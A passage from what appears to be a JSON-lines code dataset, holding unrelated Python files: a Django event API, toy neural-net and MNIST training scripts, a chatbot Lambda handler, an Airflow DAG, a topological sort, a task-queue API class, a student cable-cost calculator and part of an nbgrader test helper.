obj.start_time <= timedelta(days=1):\n ret['end_time'] = None\n if hasattr(obj, 'days_left'):\n ret['days_left'] = int(obj.days_left)\n\n return ret\n\n class Meta:\n model = Event\n exclude = ['has_start_time', 'has_end_time']\n\n\ndef parse_time(time_str, is_start):\n time_str = time_str.strip()\n # Handle dates first. Assume dates are given in local timezone.\n # FIXME: What if there's no local timezone?\n try:\n dt = datetime.strptime(time_str, '%Y-%m-%d')\n dt = dt.replace(tzinfo=LOCAL_TZ)\n except ValueError:\n dt = None\n if not dt:\n if time_str.lower() == 'today':\n dt = datetime.utcnow().replace(tzinfo=pytz.utc)\n dt = dt.astimezone(LOCAL_TZ)\n dt = dt.replace(hour=0, minute=0, second=0, microsecond=0)\n if dt:\n # With start timestamps, we treat dates as beginning\n # at midnight the same day. End timestamps are taken to\n # mean midnight on the following day.\n if not is_start:\n dt = dt + timedelta(days=1)\n else:\n try:\n # Handle all other times through dateutil.\n dt = dateutil_parse(time_str)\n except TypeError:\n raise ParseError('time in invalid format (try ISO 8601 or yyyy-mm-dd)')\n return dt\n\n\nclass JSONAPIViewSet(viewsets.ReadOnlyModelViewSet):\n def initial(self, request, *args, **kwargs):\n ret = super(JSONAPIViewSet, self).initial(request, *args, **kwargs)\n self.srs = srid_to_srs(self.request.QUERY_PARAMS.get('srid', None))\n return ret\n\n def get_serializer_context(self):\n context = super(JSONAPIViewSet, self).get_serializer_context()\n\n include = self.request.QUERY_PARAMS.get('include', '')\n context['include'] = [x.strip() for x in include.split(',') if x]\n context['srs'] = self.srs\n\n return context\n\nclass LinkedEventsOrderingFilter(filters.OrderingFilter):\n ordering_param = 'sort'\n\nclass EventOrderingFilter(LinkedEventsOrderingFilter):\n def filter_queryset(self, request, queryset, view):\n queryset = super(EventOrderingFilter, self).filter_queryset(request, queryset, view)\n ordering = self.get_ordering(request)\n if not ordering:\n ordering = []\n if 'days_left' in [x.lstrip('-') for x in ordering]:\n queryset = queryset.extra(select={'days_left': 'date_part(\\'day\\', end_time - start_time)'})\n return queryset\n\nclass EventViewSet(JSONAPIViewSet):\n \"\"\"\n # Filtering retrieved events\n\n Query parameters can be used to filter the retrieved events by\n the following criteria.\n\n ## Event time\n\n Use `start` and `end` to restrict the date range of returned events.\n Any events that intersect with the given date range will be returned.\n\n The parameters `start` and `end` can be given in the following formats:\n\n - ISO 8601 (including the time of day)\n - yyyy-mm-dd\n\n In addition, `today` can be used as the value.\n\n Example:\n\n event/?start=2014-01-15&end=2014-01-20\n\n [See the result](?start=2014-01-15&end=2014-01-20 \"json\")\n\n ## Event location\n\n ### Bounding box\n\n To restrict the retrieved events to a geographical region, use\n the query parameter `bbox` in the format\n\n bbox=west,south,east,north\n\n Where `west` is the longitude of the rectangle's western boundary,\n `south` is the latitude of the rectangle's southern boundary,\n and so on.\n\n Example:\n\n event/?bbox=24.9348,60.1762,24.9681,60.1889\n\n [See the result](?bbox=24.9348,60.1762,24.9681,60.1889 \"json\")\n\n # Getting detailed data\n\n In the default case, keywords, locations, and other fields that\n refer to separate resources are only displayed as simple references.\n\n If you want to include the complete data from related resources in\n the current response, use the keyword `include`. For example:\n\n event/?include=location,keywords\n\n [See the result](?include=location,keywords \"json\")\n\n # Response data for the current URL\n\n \"\"\"\n queryset = Event.objects.all()\n serializer_class = EventSerializer\n pagination_serializer_class = CustomPaginationSerializer\n filter_backends = (EventOrderingFilter,)\n ordering_fields = ('start_time', 'end_time', 'days_left')\n\n def filter_queryset(self, queryset):\n \"\"\"\n TODO: convert to use proper filter framework\n \"\"\"\n\n queryset = super(EventViewSet, self).filter_queryset(queryset)\n\n if 'show_all' not in self.request.QUERY_PARAMS:\n queryset = queryset.filter(Q(event_status=Event.SCHEDULED))\n\n val = self.request.QUERY_PARAMS.get('start', None)\n if val:\n dt = parse_time(val, is_start=True)\n queryset = queryset.filter(Q(end_time__gt=dt) | Q(start_time__gte=dt))\n val = self.request.QUERY_PARAMS.get('end', None)\n if val:\n dt = parse_time(val, is_start=False)\n queryset = queryset.filter(Q(end_time__lt=dt) | Q(start_time__lte=dt))\n\n val = self.request.QUERY_PARAMS.get('bbox', None)\n if val:\n bbox_filter = build_bbox_filter(self.srs, val, 'position')\n places = Place.geo_objects.filter(**bbox_filter)\n queryset = queryset.filter(location__in=places)\n\n val = self.request.QUERY_PARAMS.get('data_source', None)\n if val:\n queryset = queryset.filter(data_source=val)\n\n val = self.request.QUERY_PARAMS.get('location', None)\n if val:\n queryset = queryset.filter(location_id=val)\n\n val = self.request.QUERY_PARAMS.get('keyword', None)\n if val:\n queryset = queryset.filter(keywords__pk=val)\n\n return queryset\n\nregister_view(EventViewSet, 'event')\n\n\nclass SearchSerializer(serializers.Serializer):\n def to_native(self, search_result):\n model = search_result.model\n assert model in serializers_by_model, \"Serializer for %s not found\" % model\n ser_class = serializers_by_model[model]\n data = ser_class(search_result.object, context=self.context).data\n data['object_type'] = model._meta.model_name\n data['score'] = search_result.score\n return data\n\nDATE_DECAY_SCALE = '30d'\n\nclass SearchViewSet(GeoModelAPIView, viewsets.ViewSetMixin, generics.ListAPIView):\n serializer_class = SearchSerializer\n\n def list(self, request, *args, **kwargs):\n languages = [x[0] for x in settings.LANGUAGES]\n\n # If the incoming language is not specified, go with the default.\n self.lang_code = request.QUERY_PARAMS.get('language', languages[0])\n if self.lang_code not in languages:\n raise ParseError(\"Invalid language supplied. Supported languages: %s\" %\n ','.join(languages))\n\n input_val = request.QUERY_PARAMS.get('input', '').strip()\n q_val = request.QUERY_PARAMS.get('q', '').strip()\n if not input_val and not q_val:\n raise ParseError(\"Supply search terms with 'q=' or autocomplete entry with 'input='\")\n if input_val and q_val:\n raise ParseError(\"Supply either 'q' or 'input', not both\")\n\n old_language = translation.get_language()[:2]\n translation.activate(self.lang_code)\n\n queryset = SearchQuerySet()\n if input_val:\n queryset = queryset.filter(autosuggest=input_val)\n now = datetime.utcnow()\n queryset = queryset.filter(end_time__gt=now).decay({\n 'gauss': {\n 'end_time': {\n 'origin': now,\n 'scale': DATE_DECAY_SCALE }}})\n else:\n queryset = queryset.filter(text=AutoQuery(q_val))\n\n self.object_list = queryset.load_all()\n\n # Switch between paginated or standard style responses\n page = self.paginate_queryset(self.object_list)\n if page is not None:\n serializer = self.get_pagination_serializer(page)\n else:\n serializer = self.get_serializer(self.object_list, many=True)\n\n resp = Response(serializer.data)\n\n translation.activate(old_language)\n\n return resp\n\n\nregister_view(SearchViewSet, 'search', base_name='search')\n","sub_path":"events/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":21896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"130285534","text":"import random\nimport math\n#возьмем встроенную библиотеку random для случайных значений\ninches = 40 #дюйму\ncentimtre = 101.6 #сантиметры\n\ndef kid_neuro(epoch, lr, accur):\n \"\"\"\n epoch - сколько раз она попробует подобрать правильный вес\n lr - learning rate -какими шагами мы попробуем двигаться?\n accur - какая точность для нас является удовлетворительной?\n \"\"\"\n W_coef = random.uniform(1,3)\n print(f\"Наш первональный вес равен: {W_coef}\") #чтобы понимать, что нам выкинул рандом\n for i in range(epoch): # воспользуемся циклами для создания прокрутки эпох\n Error = centimtre - (inches * W_coef)\n #e или error - ошибка тоже важный элемент нейронной сети\n print(f\"Наша ошибка составляет {Error}\") #будем печатать ошибки для визуализации\n\n if abs(Error) < accur:\n print(f\"Наш итогвый результат {W_coef}\")\n #нас интересует только значение по модулю\n if Error > 0:\n W_coef += lr\n #если ошибка у нас положительная, тогда нам нужно начать наращивать вес\n elif Error < 0:\n W_coef -= lr\n #если ошибка у нас отрицательная, тогда нам нужно уменьшить вес\n \n\n","sub_path":"16 Применяем навыки на практике, создание собственного проекта/code/kid_neuro/kinder.py","file_name":"kinder.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"69348668","text":"import json\r\nimport lambda_prototype_module as Module\r\nimport base64\r\n\r\ndef lambda_handler(event, context):\r\n return_string = None\r\n try:\r\n request_body = event['body']\r\n request_body = json.loads(base64.b64decode(request_body))\r\n param = request_body['action']['params']\r\n key = list(param.keys()) # 입력으로 들어오는 값을 여기서 처리함\r\n # 여러개 들어오는 경우 필수 파라미터 명이 key[0]에 들어감\r\n if key[0] == 'weather': #날씨 관련\r\n return_string = Module.CrawlingFunction.weather(Module.CrawlingFunction, param[key[0]])\r\n\r\n elif key[0] == 'feedback_upload':\r\n return_string = Module.s3IOEvent.upload_feedback(Module.CrawlingFunction, params=str(param[key[0]]))\r\n elif key[0] == 'read_feedback':\r\n return_string = Module.s3IOEvent.read_feedback(Module.CrawlingFunction, params=str(param[key[0]]))\r\n elif key[0] == 'perm_chk':\r\n return_string = request_body['userRequest']['user']['id']\r\n else:\r\n return_string = \"산돌이가 작업을 마무리하지 못했어요ㅠㅠ\\n 피드백을 통해 어떤 기능에서 오류가 발생했는지 알려주시면 빠른 시일 내에 작동 하도록 할게요\"\r\n\r\n result = {\r\n \"version\": \"2.0\",\r\n \"template\": {\r\n \"outputs\": [\r\n {\r\n \"simpleText\": {\r\n \"text\": str(return_string)\r\n }\r\n }\r\n ]\r\n }\r\n }\r\n\r\n except Exception as e:\r\n result = {\r\n \"version\": \"2.0\",\r\n \"template\": {\r\n \"outputs\": [\r\n {\r\n \"simpleText\": {\r\n \"text\": str(e)\r\n }\r\n }\r\n ]\r\n }\r\n }\r\n\r\n return {\r\n 'statusCode': 200,\r\n 'body': json.dumps(result),\r\n 'headers': {\r\n 'Access-Control-Allow-Origin': '*',\r\n }\r\n }\r\n\r\nlambda_handler(\"a\",\"b\")","sub_path":"betaSandol/lambda_prototype.py","file_name":"lambda_prototype.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"327593019","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport numpy as np\n\nmnist=input_data.read_data_sets('MNIST_data',one_hot=True) #载入数据\n\nbatch_size=100 #批大小\nbatch_n=mnist.train.num_examples//batch_size #批量\n\n#定义两个placeholder\nx=tf.placeholder(tf.float32,[None,784])\ny=tf.placeholder(tf.float32,[None,10])\n\n#参数\nW_conv1=tf.Variable(tf.truncated_normal([3,3,1,8],0,0.1)) #卷积层I:8个3*3*1的卷积核\nb_conv1=tf.Variable(tf.constant(0.1,shape=[8]))\nW_conv2=tf.Variable(tf.truncated_normal([3,3,8,16],0,0.1)) #卷积层II:16个3*3*8的卷积核\nb_conv2=tf.Variable(tf.constant(0.1,shape=[16]))\nW_fc1=tf.Variable(tf.truncated_normal([7*7*16,100],0,0.1)) #全连接层I:100个神经元\nb_fc1=tf.Variable(tf.constant(0.1,shape=[100]))\nW_fc2=tf.Variable(tf.truncated_normal([100,10],0,0.1)) #全连接层II:10个神经元\nb_fc2=tf.Variable(tf.constant(0.1,shape=[10]))\n\nx_image=tf.reshape(x,[-1,28,28,1]) #升维\nh_conv1=tf.nn.relu(tf.nn.conv2d(x_image,W_conv1,[1,1,1,1],padding='SAME')+b_conv1) #卷积I\nh_pool1=tf.nn.max_pool(h_conv1,[1,2,2,1],[1,2,2,1],padding='SAME') #池化I\nh_conv2=tf.nn.relu(tf.nn.conv2d(h_pool1,W_conv2,[1,1,1,1],padding='SAME')+b_conv2) #卷积II\nh_pool2=tf.nn.max_pool(h_conv2,[1,2,2,1],[1,2,2,1],padding='SAME') #池化II\nh_pool2_flat=tf.reshape(h_pool2,[-1,7*7*16]) #展平\nh_fc1=tf.nn.relu(tf.matmul(h_pool2_flat,W_fc1)+b_fc1) #全连接I\nprediction=tf.nn.softmax(tf.matmul(h_fc1,W_fc2)+b_fc2) #全连接II\nloss=tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y,logits=prediction)) #损失函数\ntrain=tf.train.AdamOptimizer(0.001).minimize(loss) #训练方法\naccuracy=tf.reduce_mean(tf.cast(tf.equal(tf.argmax(prediction,1),tf.argmax(y,1)),tf.float32)) #求精度\n \nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for epoch in range(21):\n for batch in range(batch_n):\n batch_xs,batch_ys=mnist.train.next_batch(batch_size)\n sess.run(train,feed_dict={x:batch_xs,y:batch_ys})\n print(\"Iter: \"+str(epoch)+\", acc: \"+str(sess.run(accuracy,feed_dict={x:mnist.test.images,y:mnist.test.labels})))\n","sub_path":"卷积神经网络版_V3.py","file_name":"卷积神经网络版_V3.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"477425545","text":"from datetime import timedelta\nfrom datetime import datetime\nfrom airflow import DAG\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.utils.dates import days_ago\nfrom airflow.utils.dates import days_ago\n\nfrom spotify_weekly_email_job import spotify_weekly_email_function\n\nmy_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': datetime.now(),\n 'email': ['test@test.com'],\n 'email_on_failure': True,\n 'email_on_retry': True,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=5),\n}\nmy_dag = DAG(\n 'spotify_email_dag',\n default_args = my_args,\n description= 'Spotify Weekly Email',\n #schedule_interval= '* * * * *'\n schedule_interval='@once'\n )\n\n\nrun_email = PythonOperator(\n task_id='spotify_weekly_email',\n python_callable= spotify_weekly_email_function,\n dag=my_dag\n)\nrun_email","sub_path":"api/dags/spotify_weekly_email_dag.py","file_name":"spotify_weekly_email_dag.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"266655403","text":"# Python program to print topological sorting of a DAG\nfrom collections import defaultdict\n\n\n# Class to represent a graph\nclass Graph:\n def __init__(self, vertices):\n self.graph = defaultdict(list) # dictionary containing adjacency List\n self.V = vertices # 정점(꼭지점) 개수\n\n # function to add an edge to graph\n def addEdge(self, from_v, to_v):\n self.graph[from_v].append(to_v)\n\n # A recursive function used by topologicalSort\n\n def topologicalSortUtil(self, vertex, visited, stack):\n\n # Mark the current node as visited.\n visited[vertex] = True\n\n # Recur for all the vertices adjacent to this vertex\n for i in self.graph[vertex]:\n if visited[i] == False: #아직 방문 안했으면, 재귀 호출\n self.topologicalSortUtil(i, visited, stack)\n\n # Push current vertex to stack which stores result\n stack.insert(0, vertex) #근데 왜 0을 고정시킬까?\n\n # The function to do Topological Sort. It uses recursive\n\n # topologicalSortUtil()\n def topologicalSort(self):\n # Mark all the vertices as not visited\n visited = [False] * self.V\n stack = []\n\n # Call the recursive helper function to store Topological\n # Sort starting from all vertices one by one\n for i in range(self.V): # 정점 개수만큼 반복문 수행\n if visited[i] == False: #아직 방문 안한 정점이면, 위상정렬 함수 실행\n self.topologicalSortUtil(i, visited, stack)\n print(stack)\n\n\ng = Graph(6)\ng.addEdge(5, 2);\ng.addEdge(5, 0);\ng.addEdge(4, 0);\ng.addEdge(4, 1);\ng.addEdge(2, 3);\ng.addEdge(3, 1);\n\nprint(\"Following is a Topological Sort of the given graph\")\ng.topologicalSort()\n","sub_path":"seung/topological_sort_test.py","file_name":"topological_sort_test.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"496392191","text":"#!/usr/bin/env python\n\"\"\"\nBase class of the TQ API.\n\"\"\"\n\n__all__ = []\n\n\n\nimport logging\nimport threading\nimport time\nfrom TQComp.TQComp import TQComp\nfrom WMCore.Configuration import Configuration\nfrom WMCore.Database.DBFactory import DBFactory\nfrom WMCore.Database.Transaction import Transaction\nfrom WMCore.WMFactory import WMFactory\n\n\nclass TQApi(object):\n \"\"\"\n Base class of the TQ API. It provides the basics to construct\n an object with access to the TQ databases.\n\n Other classes can extend this one to offer further methods\n that manage the TQ.\n \"\"\"\n\n def __init__(self, logger, tqRef, dbIface = None):\n \"\"\"\n Constructor.\n\n Param logger is a python logger (required).\n\n Param tqRef is either a reference to the TQComp object we want\n to interface with (preferred), or the WMCore.Configuration object \n that was used to configure it.\n\n Param dbIface is optional. If used, it must be a valid \n WMCore.Database.Transaction object pointing to the DB interface\n that the TQComp object is using. Otherwise, such interface\n will be retrieved/reconstructed from the tqRef.\n\n Example of how to create an API from a WMCore component:\n from TQComp.Apis.TQSubmitApi import TQSubmitApi\n from TQComp.Apis.TQApiData import Task\n\n myThread = threading.currentThread()\n tqApi = TQApi(myThread.logger, self.config, \\\n myThread.transaction)\n\n How to do create an API from the python interpreter:\n >>> from TQComp.Apis.TQStateApi import TQStateApi\n >>> import logging\n >>> mylogger = logging.getLogger(\"tqclient\")\n >>> confFile = \"/pool/TaskQueue/cms_code/WMCore-conf.py\"\n >>> from WMCore import Configuration\n >>> myconfig = Configuration.loadConfigurationFile(confFile)\n >>> api = TQApi(mylogger, myconfig, None)\n\n For many practical purposes, one can instead use the 'tqclient'\n command line interface.\n \"\"\"\n self.logger = logger\n self.logger.debug(\"Creating TQApi with params: %s, %s, %s\" % \\\n (logger, type(tqRef), dbIface))\n self.transaction = None \n if dbIface:\n self.transaction = dbIface\n\n if isinstance(tqRef, TQComp):\n self.tq = tqRef\n self.conf = None\n self.dialect = self.tq.dialect\n if not self.transaction:\n self.transaction = self.tq.transaction\n \n elif isinstance(tqRef, Configuration):\n self.tq = None\n self.conf = tqRef\n self.dialect = self.conf.CoreDatabase.dialect\n if not self.transaction:\n options = {}\n coreSect = self.conf.CoreDatabase\n if hasattr(coreSect, \"socket\"):\n options['unix_socket'] = coreSect.socket\n if hasattr(coreSect, \"connectUrl\"):\n dbStr = coreSect.connectUrl\n else:\n dbStr = self.dialect + '://' + coreSect.user + \\\n ':' + coreSect.passwd+\"@\"+coreSect.hostname+'/'+\\\n coreSect.name\n self.dbFactory = DBFactory(self.logger, dbStr, options)\n self.dbi = self.dbFactory.connect()\n self.transaction = Transaction(self.dbi)\n\n else:\n msg = \"tqRef should be instance of TQComp or WMCore.Configuration\"\n raise ValueError(msg)\n\n # Make things available for Queries (or others relying in myThread)\n myThread = threading.currentThread()\n if not hasattr(myThread, 'transaction'):\n myThread.transaction = self.transaction\n if not hasattr(myThread, 'logger'):\n myThread.logger = self.logger\n if not hasattr(myThread, 'dbi'):\n myThread.dbi = self.dbi\n\n if self.dialect == 'mysql':\n self.dialect = 'MySQL'\n self.factory = WMFactory(\"default\", \\\n \"TQComp.Database.\" + self.dialect)\n\n self.queries = self.factory.loadObject(\"Queries\")\n\n\n","sub_path":"src/python/WMCore/TaskQueue/TQComp/Apis/TQApi.py","file_name":"TQApi.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"473868784","text":"''''\r\nThis week we will modify our If Statement program to add a function to do the heavy lifting.\r\nModify your IF Statement program to add a function. This function will perform the cost calculation.\r\nThe function will have two parameters (feet and price). When you call the function, you will pass two arguments to the function;\r\n feet of fiber to be installed and the cost (remember that price is dependent on the number of feet being installed).\r\n\r\nYou probably should have the following:\r\nYour program must have a header. Use the SIU Edwardsville Programming Guide for guidance.\r\nA welcome message\r\nA function with two parameters\r\nA call to the function\r\nThe application should calculate the cost based upon the number of feet being ordered\r\nA printed message displaying the company name and the total calculated cost\r\n'''\r\n\r\n# Name: Dan Wiltse\r\n# Date: 9/15/2019\r\n# Course: DSC510\r\n# Assign #: 3.1 Programming Assignment\r\n#Purpose: This program is designed to allow a user to enter their company name and amount of fiber optic cable needed\r\n# (in feet) in order to calculate the cost to install the requested amount of fiber optic cable. It will also\r\n# adjust the cost based on the bulk discount for amount needed over 100 feet.\r\n\r\n\r\n\r\n\r\n #Welcome statement to user\r\nprint('Welcome to my cable pricing calculator program!')\r\n#Purpose statement\r\nprint('This program will allow a user to calculate the installation cost of fiber optic cable')\r\nprint(\"\\n\")\r\n#Collect company name and amount of cable needed from user using a function parameter\r\n\r\ncompanyname = input('Please enter the name of your company?')\r\n#have user input amount of cable\r\ncablelength = input('Please enter how many feet of fiber optic cable do you need?')\r\n#testing out the try statement to deal with non-numerical entries for cable length\r\ntry:\r\n cablelength = float(cablelength)\r\nexcept:\r\n print('The number entered was not an integer. Please run the code again and enter a numerical value.')\r\n\r\n#Calculate the cost of cable needed based on bulk discount. Rounding to 2 decimal places.\r\ndef MyFunction(feet, price):\r\n #print('Reciept for:', companyname)\r\n print('Number of Feet of Cable Installed:', cablelength)\r\n print('Cost per foot (bulk discount over 100 feet):', bulkcost)\r\n #print('Calculated Cost:', bulkcost,'*', cablelength, 'feet of cable =', cablecalculation, 'dollars')\r\n #print('The total fiber optic cable installation cost for', companyname, 'for' ,cablelength,\r\n # 'feet of cable will be', cablecalculation, 'dollars.')\r\n\r\n if cablelength <=100:\r\n cablecalculation = round(float(cablelength)* float(0.87),2)\r\n elif cablelength >100 and cablelength <=250:\r\n cablecalculation = round(float(cablelength)* float(0.80),2)\r\n elif cablelength >250 and cablelength <=500:\r\n cablecalculation = round(float(cablelength)* float(0.70),2)\r\n elif cablelength >500:\r\n cablecalculation = round(float(cablelength)* float(0.50),2)\r\n#Calculating the cost per foot to be used in receipt below\r\n if cablelength <=100:\r\n bulkcost = float(0.87)\r\n elif cablelength >100 and cablelength <=250:\r\n bulkcost = float(0.80)\r\n elif cablelength >250 and cablelength <=500:\r\n bulkcost = float(0.70)\r\n elif cablelength >500:\r\n bulkcost = float(0.50)\r\n\r\n\r\n#Final Output below\r\n print('Reciept for:', companyname)\r\n print('Number of Feet of Cable Installed:', cablelength)\r\n print('Cost per foot (bulk discount over 100 feet):', bulkcost)\r\n print('Calculated Cost:', bulkcost,'*', cablelength, 'feet of cable =', cablecalculation, 'dollars')\r\n print('The total fiber optic cable installation cost for', companyname, 'for' ,cablelength,\r\n 'feet of cable will be', cablecalculation, 'dollars.')\r\n\r\nMyFunction(cablelength2, bulkcost2)\r\n","sub_path":"PyCharm Scripts/DSC510-Week4/dan_wiltse_DSC510_Week4.py","file_name":"dan_wiltse_DSC510_Week4.py","file_ext":"py","file_size_in_byte":3853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"383499662","text":"# author: Pasan Fernando\n# Date: 06/15/16\n# Used to replace the character state of data matrix file for the taxa with inferred presence\n\n#################################################################################################\n\n\npec = []\npelvic =[]\n\n''' To run this code, taxa with inferred presence states for pectoral fin (pectoralinferred.txt) and pelvic fin (pelvicinferred.txt)\nmust be provided as separate lists. These lists are generated from another code that extracts this information from pectoral and pelvic\nxml files'''\n\n# reading the pelvic fin inferred presence list\npl = open('pelvicinferred.txt', 'r')\n\nfor line in pl:\n if line != '\\n':\n line = line.strip()\n # removing the naming errors\n line = line.replace(' ','_')\n line = line.replace('(', '')\n line = line.replace(')', '')\n pelvic.append(line)\n\n\n# print pelvic\n# print len(pelvic)\n\n# reading the pectoral fin inferred presence list\npc = open('pectoralinferred.txt', 'r')\n\nfor line in pc:\n if line != '\\n':\n line = line.strip()\n line = line.replace(' ','_')\n line = line.replace('(', '')\n line = line.replace(')', '')\n pec.append(line)\n\n#print len(pec)\n\npela=[]\npeca=[]\n\n# reading the input data matrix for the code\nm = open('conflicts_removed_datamatrix.txt', 'r')\n\n# defining the output matrix of the code\nout = open('modified_inferredadded_matrix.txt', 'wb+')\n\n# writing the header of the output matrix with two additional columns to distinguish inferred data\nout.write('taxa_name\\tpectoral_fin\\tpelvic_fin\\tpectoral_inferred\\tpelvic_inferred\\n')\n\n# reading the input and selects the states with inferred presence which are represented by '2' hereafter\nfor line in m:\n if (line != '\\n') and ( 'taxa_name' not in line):\n line = line.strip()\n a = line.split('\\t')\n a[0] =a[0].strip('\\'')\n\n a1 = a[0] # this line was required to keep the parenthesis within taxa names in the final VTO matrix\n a[0] = a[0].replace(' ', '_')\n a[0] = a[0].replace('(', '')\n a[0] = a[0].replace(')', '')\n if a[0] in pec:\n x = '2'\n peca.append(a[0])\n else:\n x = a[1]\n\n if a[0] in pelvic:\n y ='2'\n pela.append(a[0])\n\n else:\n y= a[2]\n\n out.write('%s\\t%s\\t%s\\t%s\\t%s\\n'%(a1,a[1],a[2],x,y))\n\n\n\n# print pela\n# print peca\n\n#################################################################################################\n# generating statistics for inferred data\n\n# defining another output file for inferred state statistics\nout1 = open('inferredstats.txt', 'wb+')\n\n# writing the number of taxa with inferred presence state\nout1.write('inferred presence for pectoral fin: %i\\n'%len(pec))\nout1.write('inferred presence for pelvic fin: %i\\n'%len(pelvic))\n\n\n# Counting the unmapped taxa with inferred presence; the unmapped taxa are mismatched between pectoral and pelvic xml files\n#with the input matrix with various naming errors; usually there are only one or two taxa like this; they are due to the presence\n# of quot instead of actual \"\" in the taxa name\n\npeld = set(pelvic) - set(pela)\npeld =list(peld)\n\npecd = set(pec) - set(peca)\npecd = list(pecd)\n\nout1.write('unmapped data for pectoral fin: %i\\n'%len(pecd))\nfor i in pecd:\n out1.write('%s\\n'%i)\nout1.write('\\n')\nout1.write('\\n')\nout1.write('unmapped data for pelvic fin %i\\n'%len(peld))\nfor i in peld:\n out1.write('%s\\n'%i)","sub_path":"4.inferredprecensereplace/inferredpresencereplace.py","file_name":"inferredpresencereplace.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"67967866","text":"# -*- coding:utf-8 -*-\nimport torch\n\n\ndef get_iou(box, boxes, ismin=False, iscuda=False, delta=1e-4):\n \"\"\"\n :param box: torch.Tensor([x1, y1, x2, y2, ...])\n :param boxes: the set of candidate box ---> dim = 2\n :param ismin: for state of containment between init box and candidate boxes\n :param iscuda: the data is on GPU\n \"\"\"\n device = torch.device(\"cuda\") if iscuda else torch.device(\"cpu\")\n box, boxes = box.to(device), boxes.to(device)\n\n x1 = torch.max(box[0], boxes[:, 0])\n y1 = torch.max(box[1], boxes[:, 1])\n x2 = torch.min(box[2], boxes[:, 2])\n y2 = torch.min(box[3], boxes[:, 3])\n\n box_area = (box[2] - box[0]) * (box[3] - box[1])\n boxes_areas = (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])\n inter_area = (x2 - x1) * (y2 - y1)\n union_areas = box_area + boxes_areas\n if ismin:\n return inter_area/(torch.min(box_area, boxes_areas) + delta)\n return torch.max(torch.Tensor([0]), inter_area/union_areas).to(device)\n\n\n\n# if __name__ == '__main__':\n# box = torch.Tensor([1.0, 1.0, 2.0, 2.0])\n# boxes = torch.Tensor([\n# [1.25, 1.25, 1.75, 1.75],\n# [1.25, 1.25, 2.0, 2.0],\n# [1.25, 1.25, 2.75, 2.75],\n# [1.75, 1.75, 5.0, 5.0],\n# ])\n# print(\"iou:\", get_iou(box, boxes))","sub_path":"Utils/iou.py","file_name":"iou.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"94140421","text":"import time\nimport os\nimport subprocess as sp\nimport sys\nimport signal\n\nfrom textwrap import dedent\nfrom .. import start_subprocess, copy_coverage_files, get_free_ports\n\n# to add a new manager for the tests, you MUST add it to this list of classes\n__all__ = [\n \"DefaultManager\",\n \"HubAuthManager\",\n \"HubAuthCustomUrlManager\",\n \"HubAuthNotebookServerUserManager\",\n \"HubAuthSSLManager\"\n]\n\nclass DefaultManager(object):\n\n nbgrader_config = dedent(\n \"\"\"\n c = get_config()\n c.NoAuth.nbserver_port = {nbserver_port}\n c.FormgradeApp.port = {port}\n \"\"\"\n )\n\n _base_url = \"\"\n _base_formgrade_url = \"http://localhost:{port}/\"\n _base_notebook_url = \"http://localhost:{nbserver_port}/notebooks/\"\n\n def __init__(self, tempdir, startup_wait=5, shutdown_wait=5):\n self.tempdir = tempdir\n self.startup_wait = startup_wait\n self.shutdown_wait = shutdown_wait\n self.formgrader = None\n self.jupyterhub = None\n self.env = os.environ.copy()\n\n ports = get_free_ports(5)\n self.port = ports[0]\n self.nbserver_port = ports[1]\n self.hub_port = ports[2] # not always used\n self.proxy_port = ports[3] # not always used\n self.hubapi_port = ports[4] # not always used\n\n print(\"port: {}\".format(self.port))\n print(\"nbserver_port: {}\".format(self.nbserver_port))\n print(\"hub_port: {}\".format(self.hub_port))\n print(\"proxy_port: {}\".format(self.proxy_port))\n print(\"hubapi_port: {}\".format(self.hubapi_port))\n\n self.base_url = self._base_url.format(\n hub_port=self.hub_port)\n self.base_formgrade_url = self._base_formgrade_url.format(\n port=self.port,\n hub_port=self.hub_port)\n self.base_notebook_url = self._base_notebook_url.format(\n nbserver_port=self.nbserver_port,\n hub_port=self.hub_port)\n\n def _write_config(self):\n with open(\"nbgrader_config.py\", \"w\") as fh:\n fh.write(self.nbgrader_config.format(\n tempdir=self.tempdir,\n port=self.port,\n nbserver_port=self.nbserver_port,\n hub_port=self.hub_port,\n hubapi_port=self.hubapi_port,\n proxy_port=self.proxy_port))\n\n def _start_jupyterhub(self):\n pass\n\n def _start_formgrader(self):\n kwargs = dict(env=self.env)\n if sys.platform == 'win32':\n kwargs['creationflags'] = sp.CREATE_NEW_PROCESS_GROUP\n\n self.formgrader = start_subprocess(\n [sys.executable, \"-m\", \"nbgrader\", \"formgrade\"],\n **kwargs)\n\n time.sleep(self.startup_wait)\n\n def start(self):\n self._write_config()\n self._start_jupyterhub()\n self._start_formgrader()\n\n def _stop_formgrader(self):\n if sys.platform == 'win32':\n self.formgrader.send_signal(signal.CTRL_BREAK_EVENT)\n else:\n self.formgrader.terminate()\n\n # wait for the formgrader to shut down\n for i in range(int(self.shutdown_wait / 0.1)):\n retcode = 